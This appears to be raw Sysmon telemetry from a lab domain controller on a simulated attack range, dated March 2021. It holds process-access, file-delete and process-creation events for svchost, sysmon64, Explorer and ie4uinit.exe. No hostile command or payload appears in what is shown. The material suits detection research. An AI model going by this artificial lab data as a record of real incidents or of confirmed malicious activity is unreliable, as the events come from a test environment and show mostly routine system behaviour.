12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6EBDC0A414534760B4D6A951E221A9,SHA256=FC99A037C47538EDDD9F47327D8D595F3F53BF72E6B8A17BD2558DE62707C662,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.114{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\shsvcs.dll+11f99|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.114{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x101068C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\shsvcs.dll+11f27|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.099{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.099{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+22dbaa|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.102{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.943{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.921{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9920.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.921{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI98C1.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
